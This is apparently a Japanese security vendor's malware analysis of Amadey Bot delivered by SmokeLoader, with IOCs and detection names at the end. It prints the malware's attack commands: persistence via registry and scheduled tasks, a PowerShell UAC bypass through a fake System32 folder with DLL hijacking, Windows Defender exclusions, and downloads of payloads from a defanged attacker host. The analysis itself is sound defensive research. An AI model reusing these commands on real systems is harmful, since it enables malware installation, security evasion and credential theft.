SmokeLoader によって拡散している Amadey Bot

Amadey Bot は2018年ごろから確認されているマルウェアであり、攻撃者の命令を受けて情報の窃取や追加マルウェアのインストールを実行することができる。一般的なマルウェアのように、Amadey もしくは不法なフォーラムなどによって販売されており、今日まで様々な攻撃者によって使用されている。

ASEC 分析チームは2019年に ASEC ブログを通じて、Amadey が攻撃に使用された事例を公開したことがある。代表的なものとしては、GandCrab ランサムウェアの攻撃者によってランサムウェアをインストールする際に使用されたり、Clop ランサムウェアとして有名な TA505 グループによって FlawedAmmyy をインストールする際に使用されたりしたことがある。これ以外にも Fallout Exploit Kit や Rig Exploit Kit の攻撃者も Amadey を攻撃に利用していたことが知られている。

ASEC 分析チームは、最近 Amadey が SmokeLoader によってインストールされていることを確認した。SmokeLoader は数年前から拡散が続いており、ASEC 統計基準で今日まで高い占有率を誇っているマルウェアである。最近では、主に正常なソフトウェアの Crack 及び Serial 生成プログラムに偽装した配布サイトから、ユーザーが直接ダウンロードする方式で配布されている。

SmokeLoader は情報窃取と関連のある多数の追加機能について、プラグイン形態で提供しており、一般的にはダウンローダーマルウェアとして追加のマルウェアをインストールする目的で使用されている。SmokeLoader が実行されると、現在実行中の検索エンジンプロセス、すなわち explorer.exe に Main Bot をインジェクションするため、実質的に不正な振る舞いを担っている Bot は検索エンジンプロセスの内部で動作する。以下は当社 ASD のログであり、検索エンジンにインジェクションされた SmokeLoader が Amadey をダウンロードすることが確認できる。

Amadey が実行されると、まず自身を以下のように Temp パスにコピーする。そして該当フォルダー、すなわち Amadey が存在するフォルダーをスタートアップフォルダーに登録し、再起動後も実行されるようにする。Amadey はそれ以外にも、持続性を維持するために自身をタスクスケジューラに登録する機能も持ち合わせている。

Amadey インストールパス
> %TEMP%\9487d68b99\bguuwe.exe

タスクスケジューラに登録するコマンド
> cmd.exe /C REG ADD
“HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders” /f /v Startup /t REG_SZ /d %TEMP%\9487d68b99\
> schtasks.exe /Create /SC MINUTE /MO 1 /TN bguuwe.exe /TR
“%TEMP%\9487d68b99\bguuwe.exe” /F

ここまでのプロセスを完了すると、C&C サーバーとの通信を開始する。以下の Fiddler ログを見ると、C&C サーバーとの通信以外にも、cred,dll プラグインをダウンロードし、ユーザー環境情報を収集して C&C サーバーを使用して窃取する機能と、追加のマルウェアとして RedLine インフォスティーラーマルウェアをインストールする機能も確認できる。

Amadey は C&C サーバーに接続する前に、感染システムの情報を収集する。収集する情報は、コンピューター名やユーザー名などの基本的な情報以外にも、インストールされている AntiVirus 製品なども含まれている。このように収集した情報は、各項目ごとのフォーマットに合わせて C&C サーバーに送信され、C&C サーバーは Amadey がダウンロードする追加のマルウェアのアドレスを返して、ダウンローダーとして動作することができる。

上記の情報から、現在実行中の Amadey はバージョン 3.21 であることが分かる。現在は分析対象の Amadey の C&C パネルに接続すると、既知のパネルと比較して若干の差が確認できる。

C&C サーバーに伝達する項目のうち、「av」は感染環境にインストールされている AntiVirus 情報を意味するが、それぞれ AntiVirus に相応する番号が存在する。参考に、13番は感染環境が Windows 10 や Windows Server 2019のような環境の場合に選択されると見られ、Windows Defender を意味するものと推定される。

これ以外にも Amadey は、定期的にスクリーンショットを撮って C&C サーバーに伝達している。現在の画面を JPG フォーマットでキャプチャし、%TEMP% パスに「129858768759」という名前で保存した後、C&C サーバーに POST する方式で送信する。

上記で確認された通信トラフィックを見ると、「cred.dll」すなわち情報窃取を目的としたプラグインをダウンロードしたことが確認できる。ダウンロードされたプラグインは Delphi プログラミング言語で開発されており、%APPDATA% パスにダウンロードされる。その後、以下のように Export 関数の Main() を引数として rundll32.exe によって実行される。

> rundll32.exe %APPDATA%\406d6c22b040c6\cred.dll, Main

窃取対象の情報は、以下のような電子メール、FTP、VPN、クライアントなどがあり、収集した情報は同じ C&C サーバーに伝達される。

情報窃取プラグインの窃取対象リスト
– Mikrotik ルーター管理プログラム Winbox
– Outlook
– FileZilla
– Pidgin
– Total Commander FTP Client
– RealVNC、TightVNC、TigerVNC
– WinSCP

上記の Fiddler ログを見ると Amadey は cred.dll プラグイン以外にも「hxxp://185.17.0[.]52/yuri.exe」アドレスから追加のマルウェアをインストールしていた。Amadey が定期的に通信しながら感染システムの情報を伝達する際、通常 C&C サーバーは NULL データを伝達するが、命令に応じてはダウンローダーの命令を伝達することができる。ダウンローダーの命令はエンコードされたデータとともに伝達されるが、これを復号化すると追加のマルウェアをダウンロードするアドレスが現れる。当該アドレスからダウンロードされるマルウェアは RedLine インフォスティーラー型マルウェアである。

参考に「hxxp://185.17.0[.]52/」アドレスに直接アクセスすると、以下のようなファイルのリストが確認できる。

各ファイルは以下のようになっており、Amadey および RedLine、そしてこれらをインストールする際に使用されるダウンローダーマルウェアである。

ダウンローダーマルウェアである xyz.exe と bin Rust プログラミング言語で開発されているのが特徴である。xyz.exe は bin をダウンロード機能や、UAC Bypass 技法を利用した定期的な権限昇格機能も担っている。この技法は、UAC Bypass 技法のうち、具体的には AutoElevate プログラムと AIS のメカニズムを悪用した方式になっている。AutoElevate プログラムは、以下のように “” 属性のあるプログラムで、特定条件を満たす場合はUAC ポップアップを表示せずに管理者権限で実行できるプログラムである。

このためには、上記の属性以外にも System32 パスのような、信頼できる位置で実行されなければならない。マルウェアは、この条件を満たすため、以下のように「C:\Windows \System32\」フォルダーを生成し、ここに AutoElevate プログラムである「FXSUNATD.exe」をコピーしていた。AIS は、内部のパスをスキャンする際にスペースが無視されるため、このパスで「FXSUNATD.exe」が実行されると、正常な System32 パスとして認知されてスキャンが成功し、AutoElevate、すなわち管理者権限で実行することができる。

> powershell.exe “New-Item -ItemType Directory ‘\?\C:\Windows \System32’ ; Copy-Item -Path
‘C:\Windows\System32\FXSUNATD.exe’ -Destination ‘C:\Windows \System32\’; powershell -windowstyle hidden
$ProgressPreference= ‘SilentlyContinue’; Invoke-WebRequest hxxp://185.17.0[.]52/bin -Outfile ‘C:\Windows
\System32\version.dll’”

> powershell.exe “Start-Process ‘C:\Windows \System32\FXSUNATD.exe’”

さらに、同じパスに不正な DLL を version.dll という名前でダウンロードする。Version.dll は「FXSUNATD.exe」が使用する DLL であり、「FXSUNATD.exe」と同じパスに位置する場合、「FXSUNATD.exe」実行時に DLL をロードする順位に応じて、当該 DLL を優先的にロードして実行する。このような方式を DLL ハイジャッキングというが、これを悪用して不正な DLL の名前を version.dll にして同一パスに生成し、「FXSUNATD.exe」を実行させるため、マルウェアが正常なプログラムにロードされて実行される。

「FXSUNATD.exe」によってロードされて実行される bin、すなわち version.dll は、実際に Amadey と RedLine をインストールするダウンローダーマルウェアである。実行されると、最初に WIndows Defender の命令を利用して %ALLUSERSPROFILE% フォルダーと Temp パスが含まれている %LOCALAPPDATA% パスをスキャン除外対象に登録し、それぞれのマルウェアをダウンロードして実行する。

> powershell -windowstyle hidden Add-MpPreference -ExclusionPath C:\ProgramData\; Add-MpPreference -ExclusionPath $env:TEMP\; Add-MpPreference -ExclusionPath $env:LOCALAPPDATA\

> powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/yuri.exe -OutFile $env:TEMP\msconfig.exe;

> powershell -windowstyle hidden Invoke-WebRequest -Uri hxxp://185.17.0[.]52/ama.exe -OutFile $env:TEMP\taskhost.exe

Amadey は過去にエクスプロイトキット(Exploit Kit)を通じて配布されたのを皮切りに、最近でも商用ソフトウェアの Crack、Serial のダウンロードページに偽装した不正なサイトにおいて、SmokeLoader を通じてインストールされている。Amadey がインストールされると、感染システムに常駐してユーザー情報を窃取するだけでなく、追加のペイロードをインストールすることもある。ユーザーは OS およびインターネットブラウザ等のプログラムの最新パッチや V3 を最新バージョンにアップデートし、このようなマルウェアの感染を事前に遮断できるよう注意を払わなければならない。

AhnLab 製品では、これらのマルウェアを以下の通り検知している。

[ファイル検知]
– Trojan/Win.MalPE.R503126 (2022.07.07.01)
– Trojan/Win.Amadey.C5196504 (2022.07.07.02)
– Trojan/Win.Delf.R462350 (2022.01.04.02)
– Trojan/Win.Generic.R503640 (2022.07.09.01)
– Downloader/Win.AutoIt.C5200737 (2022.07.11.00)
– Malware/Win.Trojanspy.R438708 (2021.08.25.01)
– Trojan/Win.Amadey.C5200739 (2022.07.11.00)
– Downloader/Win.Agent.C5198969 (2022.07.10.00)
– Downloader/Win.Agent.C5198968 (2022.07.10.00)

[ビヘイビア検知]
– Malware/MDP.Download.M1197
– Execution/MDP.Powershell.M2514

[IOC]
MD5
– c3b7cf4c76cc20e56b180b001535696f (SmokeLoader)
– 6a87b10b372f64f7890def6fbaf08bfc (bguuwe.exe : Amadey)
– 77ce635ba7fb55f0c844077fee828ce7 (cred.dll : Stealer Plugin)
– 0f4351c43a09cb581dc01fe0ec08ff83 (yuri.exe : RedLine)
– 600bb5535d0bfc047f5c61f892477045 (Proxy.exe : AutoIt ダウンローダーマルウェア)
– 18bb226e2739a3ed48a96f9f92c91359 (a.exe : Amadey – パックされていない原本)
– 27f626db46fd22214c1eb6c63193d2a0 (ama.exe : Amadey – a.exe に NULL データが追加された状態)
– 977697e93a3b2635a5b8fb7dc3dfaf6b (au.exe : Amadey – パック後の状態)
– f0cdfc42f1c1c0c2d9b518e5cb31c788 (bin : Amadey ダウンローダー – x64 DLL)
– 0fd121b4a221c7767bd58f49c3d7cda5 (xyz.exe : ダウンローダー – bin をインストール)

ダウンロード URL
– hxxp://185.17.0[.]52/yala.exe (Amadey)
– hxxp://authymysexy[.]info/5Lsq3FR/Plugins/cred.dll (Stealer Plugin)
– hxxp://185.17.0[.]52/yuri.exe (RedLine)
– hxxp://185.17.0[.]52/Proxy.exe (AutoIt ダウンローダーマルウェア)
– hxxp://185.17.0[.]52/a.exe (Amadey – パックされていない原本)
– hxxp://185.17.0[.]52/ama.exe (Amadey – a.exe に NULL データが追加された状態)
– hxxp://185.17.0[.]52/au.exe (Amadey – パック後の状態)
– hxxp://185.17.0[.]52/bin (Amadey ダウンローダー – x64 DLL)
– hxxp://185.17.0[.]52/xyz.exe (ダウンローダー – bin をインストール)

C2
– hxxp://host-file-host6[.]com (SmokeLoader)
– hxxp://host-host-file8[.]com (SmokeLoader)
– hxxp://teamfighttacticstools[.]info/5Lsq3FR/index.php (Amadey)
– hxxp://authymysexy[.]info/5Lsq3FR/index.php (Amadey)
– hxxp://nftmatrixed[.]info/5Lsq3FR/index.php (Amadey)
– 185.17.0[.]63:34397 (RedLine)

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。